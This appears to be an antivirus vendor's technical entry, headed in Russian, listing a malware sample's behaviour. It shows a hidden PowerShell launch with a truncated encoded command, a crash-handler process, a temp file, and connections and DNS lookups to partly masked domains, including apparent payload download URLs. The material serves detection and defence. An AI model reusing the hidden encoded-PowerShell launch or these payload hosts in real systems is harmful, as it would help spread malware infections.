Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABCAGoAeQB2AGoAaABvAHUAZgBxAGsAagA9ACcARAB0AHYAbwBpAHIAcQBtAGQAeABnACcAOwAkAFUAZQB5AHYAbgBiAGQAZgBqACAAPQAgACcANwA3ADIAJwA7ACQAVQBmAGQAZQB0AGMAYwBnAHgAPQAnAFQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1612
- %TEMP%\854869.cvr
- 'as###metals.com':80
- 'as###metals.com':443
- 'sk##mu.com':443
- 'ma#######descapetheroomgame.com':80
- 'jo##hs.net':443
- 'yo######smyartschool.com':80
- http://as###metals.com/wp-content/im24279/
- http://ma#######descapetheroomgame.com/cgi-bin/lj54my449/
- http://yo######smyartschool.com/order-wrappers/oj90/
- 'as###metals.com':443
- 'jo##hs.net':443
- DNS ASK as###metals.com
- DNS ASK sk##mu.com
- DNS ASK ma#######descapetheroomgame.com
- DNS ASK th####uralvalue.eu
- DNS ASK jo##hs.net
- DNS ASK yo######smyartschool.com